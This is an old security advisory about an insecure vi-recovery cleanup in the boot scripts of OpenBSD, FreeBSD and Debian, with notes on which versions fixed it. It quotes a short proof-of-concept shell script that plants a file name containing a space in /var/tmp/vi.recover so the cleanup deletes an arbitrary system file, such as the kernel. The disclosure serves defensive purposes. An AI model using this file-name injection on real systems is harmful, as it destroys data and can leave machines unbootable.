COMMAND

    vi

SYSTEMS AFFECTED

    OpenBSD, FreeBSD, Debian

PROBLEM

    Loneguard found  following.   Looks like  someone noticed  this at
    some point  in OpenBSD.  It works  on older  OpenBSD, FreeBSD  and
    Debian (others?).

        #!/bin/sh
        #
        # vibackup.sh - Loneguard 22/05/99
        # Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
        # of files
        #
        touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
        chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
        echo Now wait for ( or cause ) a reboot...

SOLUTION

    OpenBSD 2.6 does  not have this  problem as its  vi.recover script
    is  written  in  perl  and  can  handle  files with spaces in them
    sanely.

    This  has  been  fixed  in  FreeBSD  2.2-STABLE,  3.4-STABLE   and
    4.0-CURRENT (04.01.2000).